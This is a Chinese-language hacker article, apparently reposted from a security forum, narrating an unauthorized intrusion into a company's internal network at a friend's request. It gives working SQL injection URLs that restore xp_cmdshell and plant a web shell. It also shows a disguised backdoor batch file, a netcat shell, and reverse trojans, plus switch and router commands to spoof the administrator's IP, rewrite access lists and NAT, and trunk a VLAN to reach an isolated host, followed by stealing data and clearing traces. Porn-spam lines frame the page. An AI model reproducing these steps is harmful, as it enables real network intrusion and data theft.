国产一在线精品一区在线观看,国产美女一级做受在线观看

滲透某知名公司內(nèi)部網(wǎng)絡(luò)

文章作者：EvilAngel（evilangel@china.com.cn）
信息來源：邪惡八進(jìn)制信息安全團(tuán)隊(duì)（www.eviloctal.com）

此文以發(fā)表在非安全雜志后由原創(chuàng)作者友情提交到邪惡八進(jìn)制信息安全團(tuán)隊(duì) 轉(zhuǎn)載請(qǐng)注明出處及原作者

本文的目標(biāo)是一國(guó)內(nèi)知名公司的網(wǎng)絡(luò)，本文圖片、文字都經(jīng)過處理，均為偽造，如有雷同，純屬巧合。
最近一個(gè)網(wǎng)友要我?guī)退盟麄児緝?nèi)網(wǎng)一項(xiàng)重要的文件，公司網(wǎng)絡(luò)信息朋友都mail給我了，這些信息主要是幾張網(wǎng)絡(luò)拓?fù)鋱D以及在內(nèi)網(wǎng)嗅探到的信息（包括朋友所在的子網(wǎng)的設(shè)備用戶名及密碼等信息……）。參照以上信息總體整理了一下入侵的思路，如果在朋友機(jī)器安裝木馬，從內(nèi)部連接我得到一個(gè)CMD Shell，須要精心偽裝一些信息還有可能給朋友帶來麻煩，所以選擇在該網(wǎng)絡(luò)的網(wǎng)站為突破口，而且管理員不會(huì)認(rèn)為有“內(nèi)鬼”的存在。
用代理上肉雞，整體掃描了一下他的網(wǎng)站，只開了80端口，沒掃描出來什么有用的信息，就算有也被外層設(shè)備把信息過濾掉了，網(wǎng)站很大整體是靜態(tài)的網(wǎng)頁(yè)，搜索一下，查看源文件->查找->.asp。很快找到一個(gè)類似http://www.*****.com/news/show1.asp?NewsId=125272頁(yè)面，在后面加上and 1=1 、and 1=2前者正常，后者反回如下錯(cuò)誤。
Microsoft OLE DB Provider for ODBC Driver error ‘80040e14‘
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character sting”.
/news/show/show1.asp，行59
是IIS+MSSQL+ASP的站，在來提交：
http://www.*****.com/news/show1.asp?NewsId=125272 and 1=(select is_srvrolemember(‘sysadmin‘))
http://www.*****.com/news/show1.asp?NewsId=125272 and ‘sa‘=(select system_user)
結(jié)果全部正常，正常是說明是當(dāng)前連接的賬號(hào)是以最高權(quán)限的SA運(yùn)行的，看一下經(jīng)典的“sp_cmdshell”擴(kuò)展存儲(chǔ)是否存在，如果存在那就是初戰(zhàn)告捷。
http://www.*****.com/news/show1.asp?NewsId=125272 and 1=(select count(*) from master.dbo.sysobjects where xtype = ‘x’ and name = ‘xp_cmdshell‘)
失敗，看看是否可以利用xplog70.dll恢復(fù)，在提交：
http://www.*****.com/news/show1.asp?NewsId=125272;exec master.dbo.sp_addextendedproc ‘xp_cmdshell‘,’xplog70.dll’
在試一下xp_cmdshell是否恢復(fù)了，又失敗了，看樣管理是把xp_cmdshell和xplog70.dll刪除了，想利用xp_cmdshell“下載”我們的木馬現(xiàn)在是不可能的。首先我們先要得到一個(gè)WEB Shell，上傳xplog70.dll，恢復(fù)xp_cmdshell在利用xp_cmdshell運(yùn)行我們上傳的木馬，這都是大眾入侵思路了，前輩們以經(jīng)無數(shù)人用這個(gè)方法入侵成功。拿出NBSI掃一下，一會(huì)后臺(tái)用戶名和密碼是出來了，可是后臺(tái)登錄地址掃不出來，測(cè)試了N個(gè)工具、手工測(cè)試也沒結(jié)果，有可能管理員把后臺(tái)刪除了。我們想辦法得到網(wǎng)站的目錄，這時(shí)就須要用到xp_regread、sp_makewebtask兩個(gè)擴(kuò)展存儲(chǔ)，試一下是否存在：
http://www.*****.com/news/show1.asp?NewsId=125272and 1=(select count(*) from master.dbo.sysobjects where name = ‘xp_regread‘)
http://www.*****.com/news/show1.asp?NewsId=125272and 1=(select count(*) from master.dbo.sysobjects where xtype=‘X‘ and name = ‘sp_makewebtask‘)
全部返回正常說明存在(一般的網(wǎng)管不太了解他們，存在也很正常)，首先簡(jiǎn)單介紹一下xp_regread擴(kuò)展存儲(chǔ)過程及sp_makewebtask Web助手存儲(chǔ)過程，xp_regread是用來讀取注冊(cè)表信息的，我們可以通過這個(gè)來得到保存在注冊(cè)表中的Web絕對(duì)路徑。sp_makewebtask這個(gè)就是我們用來得到WEB Shell的，主要功能就是導(dǎo)出數(shù)據(jù)庫(kù)中表的記錄為文件。這個(gè)方法網(wǎng)上很早就出現(xiàn)了，我們網(wǎng)站的目錄在注冊(cè)表里是在HKEY_LOCAL_MACHINE‘,‘SYSTEM\ControlSet001\Services\W3SVC\Parameters\，我們?cè)跀?shù)據(jù)庫(kù)里建一個(gè)表，將他存儲(chǔ)在表里，在使數(shù)據(jù)庫(kù)錯(cuò)誤回顯在IE里。
http://www.*****.com/news/show1.asp?NewsId=125272;create table [dbo].[biao]([zhi][char](255));
這時(shí)候我們就建了一個(gè)名為biao的表，并添加了一個(gè)類型為char長(zhǎng)度是255的字段，名為zhi，然后添加數(shù)據(jù)：
http://www.*****.com/news/show1.asp?NewsId=125272;declare @result varchar(255) exec master.dbo.xpregread‘HKEY_LOCAL_MACHINE‘,‘SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots‘,‘/‘, @result output insert into biao (zhi) values(@result);--
然后暴出WEB絕對(duì)路徑：http://www.*****.com/news/show1.asp?NewsId=125272 and 1=(select count(*) from biao where zhi>1)
IE返回錯(cuò)誤，得到網(wǎng)站的物理路徑e:\inetput\web\，向網(wǎng)站目標(biāo)寫個(gè)小網(wǎng)頁(yè)木馬，一個(gè)朋友以前寫過一個(gè)程序，由于只是內(nèi)部用的，我就不抓圖了，網(wǎng)上早就有發(fā)布過這種工具，有興趣下載自己看看吧！原理都是一樣的，如果想手工輸入就是麻煩了點(diǎn)，但可以向網(wǎng)站腳本文件寫入“一句話木馬”在遠(yuǎn)程提交，以得到一個(gè)大馬的目的。登錄木馬后把自己機(jī)器的xplog70.dll上傳到網(wǎng)站目錄在傳一個(gè)hacker‘s door，黑客之門只有一個(gè)dll，我們要建一個(gè)批處理，名子為run.bat：
@echo off
@rundll32 kernel,DllRegisterServer svchost.exe
@del run.bat
在拿一下文件合并器，將我們建的批處理和dll文件合并成一個(gè)exe文件，黑客之門的使用方法我就不多說了，他有詳細(xì)的使用手冊(cè)，建議在處理一下，以免傳到服務(wù)器上被查殺。黑客之門主要用處是可以利用服務(wù)器上所開的任何端口和我通信，現(xiàn)在恢復(fù)他的xp_cmdshell擴(kuò)展存儲(chǔ)：
http://www.*****.com/news/show1.asp?NewsId=125272;exec master.dbo.sp_addextendedproc ‘xp_cmdshell‘,’e:\inetput\web\xplog70.dll’;--
在IE里提交：exec master.dbo.xp_cmdshell’ e:\inetput\web\rootkit.exe’ rootkit.exe是黑客之門改的名子，注意這個(gè)程序要解綁到系統(tǒng)目錄如圖1。

木馬運(yùn)行后，Nc –vv ip 80 輸入密碼就得到一個(gè)CMD Shell，在放一個(gè)隱藏的asp木馬，簡(jiǎn)單的把入侵的痕跡清理一下。以上的方法很早就有了，由于網(wǎng)上資料也很多、本文主要說滲透內(nèi)網(wǎng)，篇幅有限我就不過多解釋了。
滲透內(nèi)網(wǎng)
這個(gè)網(wǎng)絡(luò)很大共有七個(gè)網(wǎng)管，現(xiàn)在當(dāng)前位置是F網(wǎng)、朋友在B網(wǎng)、目標(biāo)在A網(wǎng)。朋友給的資料，目前接入internet的兩臺(tái)設(shè)備未知(假設(shè)未知的設(shè)備都是路由器)，圖2是該公司大體的網(wǎng)絡(luò)拓?fù)鋱D。掌握B網(wǎng)所有設(shè)備用戶名密碼（朋友之前嗅探到的）。除A網(wǎng)其它網(wǎng)絡(luò)可以自由通信， A網(wǎng)內(nèi)有公司重要信息所以不像其它網(wǎng)，它是不允許任何人訪問的，路由不給予轉(zhuǎn)發(fā)數(shù)據(jù)，也就是只進(jìn)不出的網(wǎng)絡(luò)，雖然現(xiàn)在的網(wǎng)絡(luò)是外緊內(nèi)松，但是想進(jìn)入目標(biāo)主機(jī)還是有些難度。怎么跨過設(shè)備的限制到達(dá)目標(biāo)呢！您還要向下看?，F(xiàn)在首要的目的就是讓router3給我們轉(zhuǎn)發(fā)數(shù)據(jù)包。

首先嘗試telnet登錄路由，拒絕訪問不能登錄，我想也不能登錄，應(yīng)該是訪問控制列表限制了。
現(xiàn)在我們首要目標(biāo)拿下router3的控制權(quán)，為什么目標(biāo)定位在router3呢！
我們現(xiàn)在知道他的登錄密碼；
我當(dāng)前位置可以和B網(wǎng)直接通信；
Router3是A、B網(wǎng)絡(luò)公用的，應(yīng)該兩個(gè)網(wǎng)管都有權(quán)限登錄；
這一點(diǎn)也是最重要的，只有router3給予數(shù)據(jù)轉(zhuǎn)發(fā)才可以和目標(biāo)主機(jī)通信；
個(gè)人認(rèn)為router3是最佳路線，現(xiàn)在假設(shè)一下，如果B網(wǎng)管理員所管理的設(shè)備只有他本身所用的IP或TFTP Server（兼DHCP Server）才可以登錄設(shè)置，那么有如下思路可以完成入侵。一般來說管理員主機(jī)一定可以登錄這臺(tái)路由器的，網(wǎng)管主機(jī)都不可以登錄設(shè)備那么誰為維護(hù)網(wǎng)絡(luò)呢！
1、直接得到B網(wǎng)管理員主機(jī)的一個(gè)CMD Shell來登錄設(shè)備。
2、得到管理員同網(wǎng)段一臺(tái)主機(jī)的CMD Shell，從而利用ARP欺騙來telnet目標(biāo)路由。
3、得到B網(wǎng)其它網(wǎng)段中可訪問外部網(wǎng)絡(luò)一臺(tái)主機(jī)的CDM Shell，偽裝CDM Shell主機(jī)IP地址，必要情況偽裝IP+MAC地址來欺騙路由器，（機(jī)會(huì)高達(dá)到50%）。
經(jīng)過分析拿B網(wǎng)的DHCP服務(wù)器（172.16.101.25）開始，選擇突破點(diǎn)也是很重要的，DHCP服務(wù)器為了提供這個(gè)網(wǎng)段的服務(wù)他是暴露在相對(duì)外部的，而且不在VLAN的管轄中，還和網(wǎng)管在同一交換機(jī)下，而且聽朋友說他們公司PC幾乎不打補(bǔ)丁，還有很多員工不知補(bǔ)丁為何物，這也給入侵帶來及大的方便。利用服務(wù)器的WEB木馬上傳一些流行的溢出程序，直接拿個(gè)溢出程序溢出他的DHCP服務(wù)器，（最后才知道2003年的溢出程序?qū)@個(gè)主機(jī)都有用）成功得到一個(gè)System權(quán)限的CMD Shell。
革命尚未成功，同志們還須努力??！“下載”我們?nèi)怆u一個(gè)反彈的木馬，我們的肉雞是不能主動(dòng)連接DHCP服務(wù)的，好像有點(diǎn)費(fèi)話?，F(xiàn)在這個(gè)主機(jī)就是我們?cè)趦?nèi)網(wǎng)的一個(gè)接入點(diǎn)，放棄我們剛才控制的那個(gè)WEB主機(jī)，利用反彈木馬開的個(gè)CMD。telnet一下路由，%connection closed by remote host!還是連接失敗，不能登錄路由器，看樣只有172.16.101.15這臺(tái)主機(jī)（管理員IP）可以登錄了，我們看一下登錄他的交換機(jī)OK不（一般工作組交換機(jī)權(quán)限設(shè)置不會(huì)那么BT）。
telnet 172.16.101.253 //交換機(jī)管理地址
Password:
center>enable
Password:
成功登錄，show mac-access、show cdp neighbors、show arp一些命令判斷管理員對(duì)應(yīng)的結(jié)口，管理員的IP對(duì)應(yīng)的是FastEthernet 7/1，這個(gè)時(shí)候要用到IP地址的欺騙，在此感謝EST長(zhǎng)的最難看的哥哥。
#interface FastEthernet 7/1
#shutdown
當(dāng)然，這要等網(wǎng)管離開的時(shí)候才可以，這就要內(nèi)外結(jié)合了。這個(gè)時(shí)候172.16.101.15這臺(tái)主機(jī)在網(wǎng)絡(luò)上以消失了，我們?cè)囈幌侣酚墒欠裨试S網(wǎng)管的主機(jī)登錄，把自己的IP改成172.16.101.15,輸入：
netsh >interface ip
netsh interface ip >dump看一下接口配置信息
netsh interface ip >set address name = ″本地連接″ source = static addr = 172.16.101.15 mask = 255.255.255.0
這時(shí)候當(dāng)前主機(jī)地址改為172.16.101.15，現(xiàn)在這個(gè)主機(jī)會(huì)和我斷掉，但只是一小會(huì)，我們的反彈木馬一會(huì)就能上線。一般重新變改IP地址要發(fā)個(gè)ARP包告訴網(wǎng)絡(luò)其它主機(jī)，大概意思是我的IP是172.16.101.15，MAC地址是00-00-00-00-12-34，以后有發(fā)往172.16.101.15地址的數(shù)據(jù)包都有我來響應(yīng)。交換機(jī)刷新地址表后這臺(tái)主機(jī)偽裝成功。在telnet登錄路由器，如圖2

show running-config看一下配置信息，把路由配置信息COPY到記事本在分析，找到如下配置信息。
access-list 99 172.16.8.88 0.0.0.0 //A網(wǎng)管理員地址
access-list 99 172.16.101.15 0.0.0.0
訪問列表99限制只有以上兩個(gè)IP可以登錄路由，看來是這個(gè)家伙在作怪。刪除99訪問列表，在添加99訪問列表：
#access-list 99 172.16.68.88 0.0.0.0
#access-list 99 172.16.101.15 0.0.0.255 //改成172.16.101.0/24網(wǎng)段都可以登錄
#line vty 0 4
#access-class 99 in
退出路由系統(tǒng)，把自己IP改回來，把交換機(jī)設(shè)置也改回來以免網(wǎng)管回來被發(fā)現(xiàn)。
center(config)#interface FastEthernet 7/1
center(config-if)#no shutdown
簡(jiǎn)單的清理一下留下的痕跡，退出他們的網(wǎng)絡(luò)來分析一下網(wǎng)管是怎么配置的路由，在路由配置信息中有幾條重要信息。
ip nat pool NO.1027 10.255.200.1 10.255.200.105 netmask 255.255.255.0
ip nat inside source list 10 pool NO.1027 overload
access-list 10 permit 172.16.7.0 0.0.0.255
access-list 10 permit 172.16.8.0 0.0.0.255
……
router eigrp 10
真是不敢恭維網(wǎng)管的技術(shù)，一條訪問列表可以搞定的事，非要分成N個(gè)訪問列表來描述。到這時(shí)才明白為什么朋友不能訪問目標(biāo)主機(jī)，因?yàn)锳網(wǎng)邊界路由器為其作NAT的地址轉(zhuǎn)換，將B類地址轉(zhuǎn)換成A類地址，并且有訪問列表限制?，F(xiàn)在要使當(dāng)前主機(jī)和目標(biāo)主機(jī)在“堡壘”中建立一條專用的“線路”。我這對(duì)路由的配置不是很熟悉，也不敢太多的嘗試，以免被網(wǎng)管發(fā)現(xiàn)，但是我們可以“重新”配置一下他的eigrp協(xié)議，使內(nèi)部的地址完全暴露在外邊，但此辦法太容易讓網(wǎng)管發(fā)現(xiàn)，但是當(dāng)時(shí)沒想出別的辦法來。
#clear ip nat translation *
#no ip nat inside source list 10 pool NO.1027 overload
#no …… //去掉他的訪問列表及NAT配置信息
#router eigrp 10
(config-router)#network 172.16.2.0 0.0.0.255
(config-router)#network 172.16.3.0 0.0.0.255
(config-router)#network …… //把所有的網(wǎng)段加進(jìn)去
#reload 10 //10分鐘后設(shè)備自動(dòng)重啟
現(xiàn)在路由器就可以為我們轉(zhuǎn)發(fā)數(shù)據(jù)包了，并且在10分鐘自動(dòng)重啟使更改的的配置失效，我們現(xiàn)在只差一步就大功告成了，現(xiàn)在須要在我控制的那臺(tái)主機(jī)到目標(biāo)主機(jī)創(chuàng)建一條干線使我們的數(shù)據(jù)包可以直接到達(dá)目標(biāo)主機(jī)。
show cdp neighbors得到如下信息：
Device ID Local Intrfce Holdtme Capability Platform Port ID
Router3 Fas0/12 176 R 2621 4
在交換機(jī)中添加VLAN 13，（目標(biāo)主機(jī)的VLAN號(hào)），進(jìn)入Fas0/12端口， “switchport trunk all vlan add 13 ”，在trunk中添加VLAN13，使這條線路可以通過VLAN13的數(shù)據(jù)，沒有必要改變自己的VLAN號(hào)，路由器現(xiàn)在沒有訪問列表來控制我們的數(shù)據(jù)流。這個(gè)時(shí)候我們ping 172.16.8.120目標(biāo)主機(jī)物理IP地址數(shù)據(jù)包可以到達(dá)了。

這次入侵也接近尾聲了，和以前一樣還是溢出后安裝一個(gè)反彈木馬，使他可以主動(dòng)連接我的肉雞，當(dāng)然這要在10分鐘內(nèi)搞定，否則要重新進(jìn)路由改變他重啟的時(shí)間，備份他硬盤上的數(shù)據(jù)，備份肉雞上的數(shù)據(jù)，最后就是清理一下入侵的痕跡。這次入侵大約10天才完成，因?yàn)橐鹊教囟ǖ臅r(shí)間才可以改變他的網(wǎng)絡(luò)設(shè)備配置，比如改變路由器的訪問列表進(jìn)一定要等到下班時(shí)間，大多用戶不使用網(wǎng)絡(luò)時(shí)、而目標(biāo)主機(jī)還在使用網(wǎng)絡(luò)時(shí)、網(wǎng)管還沒有關(guān)閉設(shè)備時(shí)，也就是要和網(wǎng)管打個(gè)時(shí)間差。
本文經(jīng)過N次的篩選終于從萬字的文章精減出此文，可讀性、實(shí)用性一定會(huì)有不同程度上的衰減，本次入侵沒有什么新的技術(shù)，主要說怎樣繞過內(nèi)部網(wǎng)絡(luò)設(shè)備的限制，只不過是一些經(jīng)驗(yàn)的疊加，針對(duì)網(wǎng)絡(luò)設(shè)備入侵這也算很初級(jí)的。

當(dāng)時(shí)投稿的時(shí)候少寫了個(gè)步驟，少了是不會(huì)成功的，仔細(xì)看的朋友一定能看出來

本站僅提供存儲(chǔ)服務(wù)，所有內(nèi)容均由用戶發(fā)布，如發(fā)現(xiàn)有害或侵權(quán)內(nèi)容，請(qǐng)點(diǎn)擊舉報(bào)。

免费视频淫片aa毛片_日韩高清在线亚洲专区vr_日韩大片免费观看视频播放_亚洲欧美国产精品完整版